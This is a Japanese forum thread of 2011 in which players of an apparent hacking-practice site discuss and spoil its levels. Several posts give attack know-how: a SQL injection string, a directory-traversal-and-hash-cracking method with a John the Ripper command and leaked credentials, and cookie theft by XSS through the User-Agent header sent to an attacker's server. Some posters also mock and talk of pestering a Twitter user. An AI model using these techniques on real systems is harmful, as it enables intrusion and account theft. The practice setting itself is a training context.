209名無しさん@お腹いっぱい。:2011/02/24(木) 13:46:24.64
もう問題かえてくんないかな、ネタバレしすぎ
210名無しさん@お腹いっぱい。:2011/02/24(木) 13:54:45.70
LV4も楽勝w
XSSだね。
ユーザエージェントに書き込めばおk
211名無しさん@お腹いっぱい。:2011/02/24(木) 13:58:10.29
こいつネタバレしやがった
212名無しさん@お腹いっぱい。:2011/02/24(木) 14:00:34.74
すげぇ・・とか思われると頭のどっかで思ってるんだろうな。
213名無しさん@お腹いっぱい。:2011/02/24(木) 14:01:27.51
LV4ごときでハッカー扱いとか世の中なめすぎ
214名無しさん@お腹いっぱい。:2011/02/24(木) 14:03:36.92
なんで書いちゃうの?Lv4クリア者のリストが短いほうが嬉しくないの?
無粋すぎて身の毛がよだつわ
215名無しさん@お腹いっぱい。:2011/02/24(木) 14:12:30.79
twitterなんてもっとひどいぞlv1からやってること逐一書いてるバカとか、バカばかり
216名無しさん@お腹いっぱい。:2011/02/24(木) 14:12:45.50
すげぇ・・・バカ。
217名無しさん@お腹いっぱい。:2011/02/24(木) 14:14:25.53
馬鹿か本当に天才過ぎるんだろ。
218名無しさん@お腹いっぱい。:2011/02/24(木) 14:20:24.74
まあ仮に天才だったらlv4をクリアした人数が増えてるはずだけどな
219名無しさん@お腹いっぱい。:2011/02/24(木) 14:21:22.75
johnのGUIはiniが見つからないってエラーになると思うが。
220名無しさん@お腹いっぱい。:2011/02/24(木) 14:21:37.10
知ったかぶってXSSとか言っとけばバカが釣れる
ここがメルカトル速報だ
221名無しさん@お腹いっぱい。:2011/02/24(木) 14:23:29.34
>>220
よう!ハッカーのたまごちゃん!元気?
222名無しさん@お腹いっぱい。:2011/02/24(木) 14:24:12.01
てかレベル5まだぁ?
223名無しさん@お腹いっぱい。:2011/02/24(木) 14:27:01.27
おちんちん
224名無しさん@お腹いっぱい。:2011/02/24(木) 14:27:34.07
2chにもtwitterにも禁書厨が沸いてこないのが意外だった
225名無しさん@お腹いっぱい。:2011/02/24(木) 14:42:26.40
LV4のヒント:sessionid
226名無しさん@お腹いっぱい。:2011/02/24(木) 14:43:10.46
あーもう答えいっちゃったかな
227名無しさん@お腹いっぱい。:2011/02/24(木) 14:49:28.72
lv4のヒント:html
228名無しさん@お腹いっぱい。:2011/02/24(木) 15:05:50.29
お前ら釣りすぎw
lv4ヒント:javascript
229名無しさん@お腹いっぱい。:2011/02/24(木) 15:08:15.00
lv4何がどう修正されたの?
230名無しさん@お腹いっぱい。:2011/02/24(木) 15:09:25.66
>>229
クリアしたの今日だからわからん
231名無しさん@お腹いっぱい。:2011/02/24(木) 15:18:08.68
>>201
ツールのマニュアルも読めないの。そりゃいいハッカーになれるよ
232名無しさん@お腹いっぱい。:2011/02/24(木) 15:18:46.78
lv4のヒント:CSS
233名無しさん@お腹いっぱい。:2011/02/24(木) 15:19:46.60
>>232
ダウト
234名無しさん@お腹いっぱい。:2011/02/24(木) 15:32:10.00
Lv3の問題かわった?
235名無しさん@お腹いっぱい。:2011/02/24(木) 15:57:29.44
Lv4がXSSって言うけどさ、それってログインできない人にしか効果ないんじゃねw
236名無しさん@お腹いっぱい。:2011/02/24(木) 15:59:23.82
from_VIPwww おまwwwちょwww
237名無しさん@お腹いっぱい。:2011/02/24(木) 16:00:31.80
ハッカー増えた?めりこんじゃった?
238名無しさん@お腹いっぱい。:2011/02/24(木) 16:01:22.35
239名無しさん@お腹いっぱい。:2011/02/24(木) 16:02:05.38
>>233
いや、XSSはCSSとも言う
240名無しさん@お腹いっぱい。:2011/02/24(木) 16:02:30.13
何もわかってない証拠
241名無しさん@お腹いっぱい。:2011/02/24(木) 16:03:22.01
>>235
できない人いるじゃん
242名無しさん@お腹いっぱい。:2011/02/24(木) 16:03:48.15
>>238
あぁ・・・お前全く仕組みを理解できてないわ
243名無しさん@お腹いっぱい。:2011/02/24(木) 16:04:20.69
>>238
できないんだから、やり方が間違ってんだろ。
244名無しさん@お腹いっぱい。:2011/02/24(木) 16:05:03.70
>>242
ごめん、くわしく教えてくれる?
245名無しさん@お腹いっぱい。:2011/02/24(木) 16:05:25.00
おまいら、ネタバレ騒いでるけど
>>128>>130あたりで既に濃厚なんだから
それほどネタバレにならんだろ

実際は、擬似っぽい+コード組めないため
俺はそこでとまってる
246名無しさん@お腹いっぱい。:2011/02/24(木) 16:07:13.53
>XSSやもだ
やもって何?
247名無しさん@お腹いっぱい。:2011/02/24(木) 16:07:43.63
>>244
ディレクトリを遡る方法を考えればいい
248名無しさん@お腹いっぱい。:2011/02/24(木) 16:08:33.99
>>244
人に回答聞いてクリアしてもつまんねーぞ?
249名無しさん@お腹いっぱい。:2011/02/24(木) 16:10:58.92
>>247
ありがとう
なんとかファイルが見えたよ
でもこれ暗号化されてるじゃんヽ(`Д´)ノウワァァァン!!
250名無しさん@お腹いっぱい。:2011/02/24(木) 16:14:31.60
残念だったね
251名無しさん@お腹いっぱい。:2011/02/24(木) 16:15:04.53
最近のゆとりはパないな・・・
252名無しさん@お腹いっぱい。:2011/02/24(木) 16:16:21.60
それよりLv.4の手順は分かるんだが俺が自分で書いたものだと消されてしまうんだよね
これはあくまでクラック体験サイトだから作者の答えと一致してないとダメって事なのか?
253名無しさん@お腹いっぱい。:2011/02/24(木) 16:17:00.84
そんなことはLV2を見れば明らか
254名無しさん@お腹いっぱい。:2011/02/24(木) 16:18:42.80
>>253
俺が始める前のLv.2はダメダメだったらしいが改善されてたみたいなんだよな
ちくしょう!!!試してくしかないな
255名無しさん@お腹いっぱい。:2011/02/24(木) 16:18:53.72
>>252
使える文法に沿ったハックじゃないと却下される
256名無しさん@お腹いっぱい。:2011/02/24(木) 16:24:09.75
>>255
おk がんばるわ
257名無しさん@お腹いっぱい。:2011/02/24(木) 16:27:08.26
Lv4て手法が多すぎて一致させるほうが難しくないかコレ
258名無しさん@お腹いっぱい。:2011/02/24(木) 16:27:19.21
Lv3普通の暗号化ならともかく
塩漬けされてて解読できるの?
それとも総当たりするんだろうか
259名無しさん@お腹いっぱい。:2011/02/24(木) 16:29:57.84
結局のところ本当に脆弱性があるわけじゃなくてそれっぽく作ってるだけのクイズなんだよな…
LV4はなかなか作り手側が期待してる答えが見つからん
260名無しさん@お腹いっぱい。:2011/02/24(木) 16:29:59.88
このスレネタバレ祭りだな
261名無しさん@お腹いっぱい。:2011/02/24(木) 16:30:31.16
LV3ネタバレ激しいんで答え言うわ。
ID:root
Password:test123
262名無しさん@お腹いっぱい。:2011/02/24(木) 16:33:30.74
あーあ
263名無しさん@お腹いっぱい。:2011/02/24(木) 16:33:40.20
>>261
そんなに目立ちたいか
264名無しさん@お腹いっぱい。:2011/02/24(木) 16:34:17.16
答えなんてどうでもいいから考え方が知りたい
265名無しさん@お腹いっぱい。:2011/02/24(木) 16:35:47.36
>>264
俺も
266名無しさん@お腹いっぱい。:2011/02/24(木) 16:36:44.85
これがハッカーの道をそれたおこさまか。あわれなもんだ。
267名無しさん@お腹いっぱい。:2011/02/24(木) 16:39:07.66
PSPとかでもHalloworldだけ公開して脆弱性潰されてるし、どこでも同じ馬鹿はいるもんだ
268名無しさん@お腹いっぱい。:2011/02/24(木) 16:39:09.81
WEBアプリ作ったことない奴とかLinux運用したことも無い奴は帰れってことだ
269名無しさん@お腹いっぱい。:2011/02/24(木) 16:41:25.83
>>266
読みが浅いな。
肉を切らせて骨を断つって言葉知らないのか?
270名無しさん@お腹いっぱい。:2011/02/24(木) 16:44:51.12
肉を切らせたら骨抜かれちゃって骨断てなくなるのに
271名無しさん@お腹いっぱい。:2011/02/24(木) 16:45:34.25
もう答えでたから考え方だけ言うと手法はディレクトリトラバーサル
サーバのrootパスワードが置いてあるディレクトリにアクセスができる脆弱性なんだが、それだけではパスがわからなくてshadowにある暗号化されたものと合わせて初めてパスの解析ができる(まぁ本来はshadow見るにはroot権限いるわけだが)
その解析の結果とログインのパスが同じだったってだけだな
272名無しさん@お腹いっぱい。:2011/02/24(木) 16:46:55.85
ドヤァ・・・
273名無しさん@お腹いっぱい。:2011/02/24(木) 16:47:02.83
john-mmx --users=root passfile
余裕でした
274名無しさん@お腹いっぱい。:2011/02/24(木) 16:47:47.63
自力でLv.3クリアしたのがあほらしくなってくるな
275名無しさん@お腹いっぱい。:2011/02/24(木) 16:47:55.60
答えだけのネタバレなら運営が変えてしまえばすむことだが、
考え方まで書かれちゃうともうだめだな
276名無しさん@お腹いっぱい。:2011/02/24(木) 16:48:57.06
2×3と3×2は違うというあれだな
277名無しさん@お腹いっぱい。:2011/02/24(木) 16:49:02.94
これいったん
278名無しさん@お腹いっぱい。:2011/02/24(木) 16:49:21.37
Lv2の答えわからなすぎてむかついてきた。
' OR 't' = 't
でいいだろ
279名無しさん@お腹いっぱい。:2011/02/24(木) 16:50:08.18
foobarさんどこいってしもたん・・・?
280名無しさん@お腹いっぱい。:2011/02/24(木) 16:50:10.02
> その解析の結果とログインのパスが同じだったってだけだな
この無知感がたまらないな。
あと、mmx版なんて使ってるのはまさにキディ
281名無しさん@お腹いっぱい。:2011/02/24(木) 16:50:46.98
どうせ問題自体変わるんじゃないのか
5番以内にクリアしたのに500人以上いるし
282名無しさん@お腹いっぱい。:2011/02/24(木) 16:51:19.09
>>271
なんでWebなのにrootが使えるのか知ってたら教えてほしい
283名無しさん@お腹いっぱい。:2011/02/24(木) 16:52:51.22
>>282
これalpha版だからいろいろといい加減だろ
284名無しさん@お腹いっぱい。:2011/02/24(木) 16:53:21.57
>>282
>>271がそれらしい回答を出すまで言わないほうがいいか
285名無しさん@お腹いっぱい。:2011/02/24(木) 16:53:27.83
暫定的に停止だと

ソースはネットファイア公式Twitter
286名無しさん@お腹いっぱい。:2011/02/24(木) 16:57:46.59
>>278
ダメだな。全然ダメだ。
287名無しさん@お腹いっぱい。:2011/02/24(木) 16:57:58.70
まあ妥当な判断
288名無しさん@お腹いっぱい。:2011/02/24(木) 16:58:06.23
2chに解説とID/Pass書いた上にドヤ顔で解説してる馬鹿がいるってつぶやきで発覚したなw

GJ!ここの誰か!
289名無しさん@お腹いっぱい。:2011/02/24(木) 17:00:05.11
土曜日に公開すれば良かったな。
一気にLV3 1万人突破とかなったらおもしろい
290名無しさん@お腹いっぱい。:2011/02/24(木) 17:00:42.34
Lv4がわからん
UA偽装すればXSSできるのはわかるけど
ログ残したあとにfoobarさんやhogehogeさんとやらがアクセスしてくれるのか?
291名無しさん@お腹いっぱい。:2011/02/24(木) 17:00:49.68
自演乙w

でもこういうのって自分で答え出すから楽しいのにな
お前らもクリアした瞬間アドレナリンがわっさー!と出たろ?
292名無しさん@お腹いっぱい。:2011/02/24(木) 17:00:55.07
ツイッターに堂々とコピペスクリプト書いたヤツがいるぞw
293名無しさん@お腹いっぱい。:2011/02/24(木) 17:01:29.47
@qmotasつまんねえ
ネタも分からない馬鹿
視ね
294名無しさん@お腹いっぱい。:2011/02/24(木) 17:02:05.38
>>291
いや、解析結果を見て、ああなんでこれ試さなかったんだろwっておもった
295名無しさん@お腹いっぱい。:2011/02/24(木) 17:02:08.82
>>292
どこどこ?
296名無しさん@お腹いっぱい。:2011/02/24(木) 17:03:23.73
早く問題変えろよ。
ネタバレしたやつ死ねよカス。
マジカス。しね
297名無しさん@お腹いっぱい。:2011/02/24(木) 17:05:47.66
>>290
UA偽装したら普通にログイン失敗画面でjavascriptが勝手に実行されるから、
5ログ中の一番下の奴(=foobar)が失敗画面見るわけで、
自分のクッキーを別鯖に送るように書けば良いんだよ。
んで別鯖をお前が監視して、ゲットしたセッションIDをゲットできるわけだが、
その後にfoobarはログイン成功するから、
セッションIDを自分のブラウザのクッキーに仕込んでアクセスすればログイン成功
298名無しさん@お腹いっぱい。:2011/02/24(木) 17:06:06.32
マジレスしたら変なのが沸いてくるこんなalpha版レベルのサイトより海外に面白い脆弱性エミュサイトあるから探してみ
レベルも全然違う
299名無しさん@お腹いっぱい。:2011/02/24(木) 17:10:09.49
もう停止したw
対応早いなw
300名無しさん@お腹いっぱい。:2011/02/24(木) 17:12:28.10
>>297
解けたのか?
適当にやると全部置換されちまう
301名無しさん@お腹いっぱい。:2011/02/24(木) 17:15:36.54
LV3合格者の総数が増えたり減ったりしてるんだけど、ばらした奴がばれてBANされてるの?
302名無しさん@お腹いっぱい。:2011/02/24(木) 17:15:59.22
MSIE6だからActiveXObject使ってAjax?
303名無しさん@お腹いっぱい。:2011/02/24(木) 17:16:34.86
とりあえずサーバ管理する時はLv2〜Lv4くらいは最低でも対応してないと危険ってことがよく分かった。
そういう意味でとても有意義だった。

ググって手法を探す作業も悪くない
304名無しさん@お腹いっぱい。:2011/02/24(木) 17:16:59.55
qmotas くもたし
イエーイ,セキュ板の>>293見てるー?
8分前

きめえ
305名無しさん@お腹いっぱい。:2011/02/24(木) 17:17:18.99
このぐらいのことはサイト作る時点で想定しない方がおかしい。
306名無しさん@お腹いっぱい。:2011/02/24(木) 17:17:37.41
ログイン成功時点でセッションID変わるだろ?
307名無しさん@お腹いっぱい。:2011/02/24(木) 17:17:47.91
twitterと2chで連絡とるなw
308名無しさん@お腹いっぱい。:2011/02/24(木) 17:17:50.10
>>301
俺なら晒されたID/パスを罠にしてBANコースだなw
309名無しさん@お腹いっぱい。:2011/02/24(木) 17:18:01.03
qmotasみんなでフォローしてやろうぜ
310名無しさん@お腹いっぱい。:2011/02/24(木) 17:18:40.84
>>309
それいいな
311名無しさん@お腹いっぱい。:2011/02/24(木) 17:18:50.66
>>306
変わんないよ
312名無しさん@お腹いっぱい。:2011/02/24(木) 17:19:51.51
ネタバレいやなら2chなんて見るなよw
ばかじゃないのw
313名無しさん@お腹いっぱい。:2011/02/24(木) 17:20:24.69
>>309はqmota
自演乙
314名無しさん@お腹いっぱい。:2011/02/24(木) 17:20:32.33
315名無しさん@お腹いっぱい。:2011/02/24(木) 17:21:22.79
>>306
聞く前に確認しろよ。目の前の箱はダンボールか?
316名無しさん@お腹いっぱい。:2011/02/24(木) 17:21:31.65
>>312
公式のルールも守れない屑が吠えてろよwww
317名無しさん@お腹いっぱい。:2011/02/24(木) 17:21:45.54
5番目ってfoobarなの?
318名無しさん@お腹いっぱい。:2011/02/24(木) 17:21:53.63
>>303
2と4は基本で、3はあり得ないと思う。
でも基本中の基本をやらないでCSRFみたいな手に引っかかるmやpで始まる超有名大手サイトも日本にはあってな…
319名無しさん@お腹いっぱい。:2011/02/24(木) 17:22:07.94
>>312
我慢の出来ないお子ちゃまか?
320名無しさん@お腹いっぱい。:2011/02/24(木) 17:24:15.09
>>317
5番目はhogehoge
321名無しさん@お腹いっぱい。:2011/02/24(木) 17:26:24.06
なんでこいうのってhogehogeが多いの?
322名無しさん@お腹いっぱい。:2011/02/24(木) 17:27:45.36
piyopiyo
323名無しさん@お腹いっぱい。:2011/02/24(木) 17:28:48.69
fooとbarの日本語版
324名無しさん@お腹いっぱい。:2011/02/24(木) 17:28:54.36
慣例みたいな感じ
325名無しさん@お腹いっぱい。:2011/02/24(木) 17:29:02.92
piyopiyo最近見かけないな・・
326名無しさん@お腹いっぱい。:2011/02/24(木) 17:29:57.46
>>315
ここは本当にログインできるサイトじゃないだろw
それに別鯖とか持ち出してどうするよww
327名無しさん@お腹いっぱい。:2011/02/24(木) 17:32:11.74
piyoよりfugaだな
328名無しさん@お腹いっぱい。:2011/02/24(木) 17:33:16.23
俺はhogeを使う奴の書いたコードは信用しないことにしている
329名無しさん@お腹いっぱい。:2011/02/24(木) 17:33:54.61
>>297
やはり、鯖必要か。俺は鯖用意したくなくて、自分のクッキーを
書き換えてログオンできたことにする方向で考えていた。

答えうpして
330名無しさん@お腹いっぱい。:2011/02/24(木) 17:34:29.22
>>326
へ?
331名無しさん@お腹いっぱい。:2011/02/24(木) 17:34:47.35
ログイン失敗したやつがfoobarでもhogehogeでもないのであきらめた
332名無しさん@お腹いっぱい。:2011/02/24(木) 17:35:59.60
スクリプトからCookieだけ飛ばさせて自鯖を監視してたのにずっとぼっちだった俺はなんだったんだ・・・
333名無しさん@お腹いっぱい。:2011/02/24(木) 17:36:38.49
>>331
ログインに失敗したのはGoogle先生です
334名無しさん@お腹いっぱい。:2011/02/24(木) 17:37:11.68
実際に他の鯖と通信させるとかチェック面倒そうじゃね?
とかつい作る立場で考えてしまったんだが・・・
335名無しさん@お腹いっぱい。:2011/02/24(木) 17:38:32.39
別に面倒じゃないだろ
なに「深く考えすぎて逆にわからなかった」みたいな言い方してんだよ
336名無しさん@お腹いっぱい。:2011/02/24(木) 17:40:15.04
Lv3暫定的に停止って言ってたけど動いてるな
パスワード通らないし、クリア不可能状態?
337名無しさん@お腹いっぱい。:2011/02/24(木) 17:40:24.08
面倒だろ
338名無しさん@お腹いっぱい。:2011/02/24(木) 17:40:58.92
スクリプトうんぬんはわかるがあのログの見方がわからん
339名無しさん@お腹いっぱい。:2011/02/24(木) 17:41:03.78
他のサーバーに飛ぶわけないだろ。
そんなことしたらネットファイアが攻撃もとのサイトになるじゃないかw
340名無しさん@お腹いっぱい。:2011/02/24(木) 17:41:26.19
>>337
UAの対して規定のデータ送るだけだから面倒じゃないはず
341名無しさん@お腹いっぱい。:2011/02/24(木) 17:41:38.48
こういうのって向こうさんのログは面白そうだよね。
342名無しさん@お腹いっぱい。:2011/02/24(木) 17:41:45.14
Lv3のパスワード一応分かったんだけど、入力しても間違ってるって言われた…
もうギブアップだわ…
343名無しさん@お腹いっぱい。:2011/02/24(木) 17:42:17.52
>>333
whoisしてびびったわ
344名無しさん@お腹いっぱい。:2011/02/24(木) 17:44:16.84
>>340
>>297のとおりだと、誰かが書いたスクリプトによって、どこかのサーバへのリクエストが行われ、
それが成功したかどうかを検知して次のステージに進ませるんだよねぇ。
俺は面倒だと思うなぁ。
345名無しさん@お腹いっぱい。:2011/02/24(木) 17:46:46.65
>>297が中の人で、このスレを見ている人間が管理しているサーバを見つけようとしているのなら無粋なことをした。
346名無しさん@お腹いっぱい。:2011/02/24(木) 17:48:22.78
>>344
面倒どころか魔法だよ。
347名無しさん@お腹いっぱい。:2011/02/24(木) 17:49:08.45
>>297
え、向こうが想定した内容のUAにしてアクセスすればわざわざbotがアクセスしに来てくれるの?
348名無しさん@お腹いっぱい。:2011/02/24(木) 17:51:26.28
俺はそんな面倒な事じゃなくて作者が想定してるjsでいけば作者からのjsで答えを教えてくれるくらいのレベルで考えてたんだが
349名無しさん@お腹いっぱい。:2011/02/24(木) 17:52:11.21
あのログ、やるたびに順繰りさせればいいのに
350名無しさん@お腹いっぱい。:2011/02/24(木) 17:52:38.81
毎回エンティティ変換されて涙目な俺は魔法使い
351名無しさん@お腹いっぱい。:2011/02/24(木) 17:52:49.75
「みんなでqmotasフォローしようぜ」とか言ってたけど、フォローしたの俺ともう1人だけじゃないか?
352名無しさん@お腹いっぱい。:2011/02/24(木) 17:55:05.72
フォローしてどうすんの?
353名無しさん@お腹いっぱい。:2011/02/24(木) 17:56:49.11
>>350
仲間。昨日からLv4でインジェクション起こせなくて詰まっとるw
354名無しさん@お腹いっぱい。:2011/02/24(木) 17:58:43.30
LV3でとまったーorz
355名無しさん@お腹いっぱい。:2011/02/24(木) 17:59:12.65
>>353
あ、前はこれだったの?
じゃあ別の方法考えないとだめかなぁ。。
356名無しさん@お腹いっぱい。:2011/02/24(木) 18:01:54.42
>>352
囲む
357名無しさん@お腹いっぱい。:2011/02/24(木) 18:05:09.77
>>352
粘着
358名無しさん@お腹いっぱい。:2011/02/24(木) 18:12:29.87
lv4
確実に動く(自サイトで実証してから)スクリプトで
相当な方法を試しているけどもダメだな。
何を想定したんだかw
正解意図の回答はいつになったら出るんだろう・・・

これはもう宝くじ状態な気がする。
同じサイト状態ならハッキング可能であろうスクリプトもはじかれる。
359名無しさん@お腹いっぱい。:2011/02/24(木) 18:14:57.79
つまり>>356>>357がフォローした2人か
360名無しさん@お腹いっぱい。:2011/02/24(木) 18:14:57.81
UA偽造しようにも後ろに,gzip(gfe),gzip(gfe),gzip(gfe)がついてうぜえ
361名無しさん@お腹いっぱい。:2011/02/24(木) 18:15:54.48
自サイトってどうやって作るの?
362名無しさん@お腹いっぱい。:2011/02/24(木) 18:18:46.98
>>331
hogehogeだろ。UAが一緒。
363名無しさん@お腹いっぱい。:2011/02/24(木) 18:19:06.63

qmotas フォローしても何もでませんよ
12分前

こっちがいろいろお見舞いするんだよ
364名無しさん@お腹いっぱい。:2011/02/24(木) 18:20:34.57
>>363
ん?lv3のパス晒してドヤ顔してた子が逆恨みの粘着か?
365名無しさん@お腹いっぱい。:2011/02/24(木) 18:21:45.55
>>363
セキュリティ板にここまで頭の弱い子がいたとわ・・・
366名無しさん@お腹いっぱい。:2011/02/24(木) 18:22:42.49
>>365
わ→は
367名無しさん@お腹いっぱい。:2011/02/24(木) 18:23:12.40
>>363
何をお見舞いしてくれるんですかね
368名無しさん@お腹いっぱい。:2011/02/24(木) 18:23:17.34
>>366
wwwwwwwwwwwwwwwwwwwww
369名無しさん@お腹いっぱい。:2011/02/24(木) 18:24:37.70
qmotasのIP抜きました1
370名無しさん@お腹いっぱい。:2011/02/24(木) 18:28:20.15
IPアドレスがわかったんだ!すごいね!きみならクラックできるよ!!
371名無しさん@お腹いっぱい。:2011/02/24(木) 18:28:47.86
>>367
冷蔵庫開けたら卵と牛乳しかなかった。
ミルクセーキでも作ってやろうか。
372名無しさん@お腹いっぱい。:2011/02/24(木) 18:30:34.52
>>371
それはちょっと嬉しい
373名無しさん@お腹いっぱい。:2011/02/24(木) 18:31:27.68
>>362
UAだけで同一とおもっちゃってよかったのか
374名無しさん@お腹いっぱい。:2011/02/24(木) 18:33:00.02
ブルートフォース解禁して欲しいw
力押し一度やってみたい。
375名無しさん@お腹いっぱい。:2011/02/24(木) 18:34:00.17
>>373
googleのロボットだったらもっと別のUAだろ。
これは実際のハックじゃなくて、必要な情報だけを載せた脱出ゲームなんだよ。
376名無しさん@お腹いっぱい。:2011/02/24(木) 18:34:07.90
鯖飛ぶじゃねーかw
377名無しさん@お腹いっぱい。:2011/02/24(木) 18:34:25.91
>>358
俺も同じ状態だ
想定してたやつ全部弾かれたわ
もはや作者の意図を読めクイズだな
378名無しさん@お腹いっぱい。:2011/02/24(木) 18:35:28.19
>>377
100の解き方があっても1つの解き方じゃないとダメだからな・・・
379名無しさん@お腹いっぱい。:2011/02/24(木) 18:36:07.76
ネットファイアの技術力アピールのつもりが、技術力の低さをアピールする結果にw
380名無しさん@お腹いっぱい。:2011/02/24(木) 18:40:47.71
>>378
一応Lv2はバリエーション増えてるみたいだけどね。それでもちょっと少なすぎる感はある
381名無しさん@お腹いっぱい。:2011/02/24(木) 18:41:10.68
だいたい、ちょっと答えをばらされたぐらいで停止措置しなきゃいけないとか、
何でこの程度の事も予測できていないの?って言いたいね。
まるで行き当たりばったり。
あらかじめ予測してすぐに対処できるように準備するのはセキュリティのイロハのイでしょうが。
こんな会社に仕事任せるのは怖くてできないわ。
382名無しさん@お腹いっぱい。:2011/02/24(木) 18:41:40.19
rベル4のログイン失敗したやつってなんだ?
383名無しさん@お腹いっぱい。:2011/02/24(木) 18:42:17.01
alpha版なんかださずに全部実装してからだせばいいものを、そしたらエラーも正しいの返ってくるのに
384名無しさん@お腹いっぱい。:2011/02/24(木) 18:42:26.77
>>381
いまさらそこが止まったところでクリア済みの人には影響ないし、いいんじゃないの
385名無しさん@お腹いっぱい。:2011/02/24(木) 18:42:51.71
最初の方に試したスクリプトが
いつの間にかOKレベルになってたらショックだよ・・・
そうでないことを願おう。
386名無しさん@お腹いっぱい。:2011/02/24(木) 18:53:20.34
おまいらlv4どのブラウザつかってる?
387名無しさん@お腹いっぱい。:2011/02/24(木) 18:54:00.35
FireFox
388名無しさん@お腹いっぱい。:2011/02/24(木) 18:55:25.24
>>386
perl+WWW::Mechanize
389名無しさん@お腹いっぱい。:2011/02/24(木) 18:59:11.35
俺クロームで
糞更新もふまえて
UA書きかえるの地獄なんだけど
390名無しさん@お腹いっぱい。:2011/02/24(木) 19:04:38.32
chromeってcookie編集できなくね
391名無しさん@お腹いっぱい。:2011/02/24(木) 19:05:04.91
webkit系でやりたいならIronにしとけ
392名無しさん@お腹いっぱい。:2011/02/24(木) 19:06:09.44
レベル3ってMD5の解析せずにパスワードを知る方法無いの?
393名無しさん@お腹いっぱい。:2011/02/24(木) 19:06:52.62
>>392
MD5についてぐぐれ
394名無しさん@お腹いっぱい。:2011/02/24(木) 19:07:38.49
>>390
っ拡張
395名無しさん@お腹いっぱい。:2011/02/24(木) 19:12:16.09
>>394
UA加工したまま拡張いれようとしてたからダメだっていわれつづけてたw
正規のUAだと問題なかったw
396名無しさん@お腹いっぱい。:2011/02/24(木) 19:13:36.15
>>393
MD5はデコードできないんでしょ?ツール使うのは頭悪そうだから他に方法無いのかなって思いました。
397名無しさん@お腹いっぱい。:2011/02/24(木) 19:13:39.59
オミトロン使えよ
398名無しさん@お腹いっぱい。:2011/02/24(木) 19:14:13.33
しかし、いい客寄せ宣伝になったな。
399名無しさん@お腹いっぱい。:2011/02/24(木) 19:15:04.65
やっとLv4クリアできた
途中の仮定操作に詰まってたよ
400名無しさん@お腹いっぱい。:2011/02/24(木) 19:19:41.76
LV4てマジで外部鯖に送信しないとダメなの?
401名無しさん@お腹いっぱい。:2011/02/24(木) 19:21:49.67
投げつけてもアクセスこないと思うんだが…。
402名無しさん@お腹いっぱい。:2011/02/24(木) 19:27:17.49
sessionidは盗んだ・・自分のクッキー変えたら自分のセッションなくなるよな・・・あれ?
403名無しさん@お腹いっぱい。:2011/02/24(木) 19:31:25.74
>>402
「盗んだ」?盗めたの?
404名無しさん@お腹いっぱい。:2011/02/24(木) 19:32:57.72
Lv4がわからん。
javascript:〜
style="x:expression(〜
も通らん。なんだこれ。
405名無しさん@お腹いっぱい。:2011/02/24(木) 19:33:00.34
Lv3はシングルクラックでオッケーなん?
406名無しさん@お腹いっぱい。:2011/02/24(木) 19:33:10.21
自分のセッションIDとかいう落ちだったりしねーよな・・・
407名無しさん@お腹いっぱい。:2011/02/24(木) 19:35:45.10
>>405
なんで試みてみようと思わないの?
違ってたらまた別のやり方でやればいいじゃない?
408名無しさん@お腹いっぱい。:2011/02/24(木) 19:39:41.91
馬鹿がつられとるw
409名無しさん@お腹いっぱい。:2011/02/24(木) 19:41:11.88
俺lv3突破できないよ
ここに晒されてるのと同じパスだったが・・・
410名無しさん@お腹いっぱい。:2011/02/24(木) 19:41:35.66
パス変更したそうだから自力でがんばれ
411名無しさん@お腹いっぱい。:2011/02/24(木) 19:44:19.29
>>410
おぉそうかありがと!
突破できるならおk
後から着たががんばってみる
412名無しさん@お腹いっぱい。:2011/02/24(木) 19:45:57.62
>>411
twitter見ると、ファイルの値が変更されてないから進めんとかいうのあるけど、一応試してみるといいかも
413名無しさん@お腹いっぱい。:2011/02/24(木) 19:46:32.13
>>403
うん
414名無しさん@お腹いっぱい。:2011/02/24(木) 19:47:48.25
>>413
どうやったか言えよ
そっから先は俺が知ってるから
415名無しさん@お腹いっぱい。:2011/02/24(木) 19:48:41.43
ついにlv4もネタバレが載っちまうのか・・・
416名無しさん@お腹いっぱい。:2011/02/24(木) 19:50:42.47
>>407
試みた。おっけ、出来た。パスはわかった、がIDがわからん
417名無しさん@お腹いっぱい。:2011/02/24(木) 19:52:57.20
>>412
ありがと
確かに出来んかった
ちなみにパスは上のレスと未だに一緒だった
>>416
パスが分かったなら結果に出てると思うよ
なんのパスが分かったのかが
418名無しさん@お腹いっぱい。:2011/02/24(木) 19:55:34.34
セッションid盗むにしても過去にさかのぼって盗めるこたぁないから
スクリプトがあっていれば何かしら擬似的な反応が返ってくるんだろ?

しかもnetfireサイト上で反応が返ってくるんだろ?
じゃないとサーバー持ってるやつしか解けないよな・・・?
419名無しさん@お腹いっぱい。:2011/02/24(木) 19:57:46.92
レベル4にログイン履歴なんてあったか?
420名無しさん@お腹いっぱい。:2011/02/24(木) 19:58:52.28
てかこのログの書き方が悪い気がする、時系列おかしくないか
421名無しさん@お腹いっぱい。:2011/02/24(木) 20:01:05.80
>>418
ばーか
422名無しさん@お腹いっぱい。:2011/02/24(木) 20:01:43.22
あれ?Lv3でshadowが見れなくなってる
423名無しさん@お腹いっぱい。:2011/02/24(木) 20:04:14.53
>>422
まじか!つい数分前は見れたよ
ついに変更されるのか?
424名無しさん@お腹いっぱい。:2011/02/24(木) 20:07:17.85
セッションID盗めたんなら>>402の発言はおかしいがなw
本気で言ってんならよく確認しろw
425名無しさん@お腹いっぱい。:2011/02/24(木) 20:07:35.90
Lv3は辞書でだめだったんで総当たりでやっと見つけて入れたらNG
なんでだ?って思ったらお前らがばらしてたのかよ
どうすんだよこれ・・

でもこのツール、10年位ぶりに使って懐かしかったw
426名無しさん@お腹いっぱい。:2011/02/24(木) 20:08:13.71
全力でLv3に取り組んでいる中学生。

シャドウファイルまでは行き着いたんだがなぁ・・・・
427名無しさん@お腹いっぱい。:2011/02/24(木) 20:09:34.59
>>426
おまえみたいな頭の悪いガキはいくらでもいるよ
428名無しさん@お腹いっぱい。:2011/02/24(木) 20:17:05.44
>>424
ほんとだw、sessionidなんだろうけどsessionidじゃなかったw
429名無しさん@お腹いっぱい。:2011/02/24(木) 20:18:19.10
lv3突破できた!
シャドウファイルが無くなったのはヒントだったのですね
ではlv4へ生かせていただきます!
430名無しさん@お腹いっぱい。:2011/02/24(木) 20:22:57.51
lv3余裕すぎワロタ
431名無しさん@お腹いっぱい。:2011/02/24(木) 20:23:08.38
やり直しかよ。ちぇ
432名無しさん@お腹いっぱい。:2011/02/24(木) 20:28:24.03
門外漢の俺には、lv4で鯖だけは避けたかった。
てか、鯖ってなんだ?鯖側の受け入れ設定とか必要なの?
433名無しさん@お腹いっぱい。:2011/02/24(木) 20:29:38.54
>>432
鯖?んなもんいらん
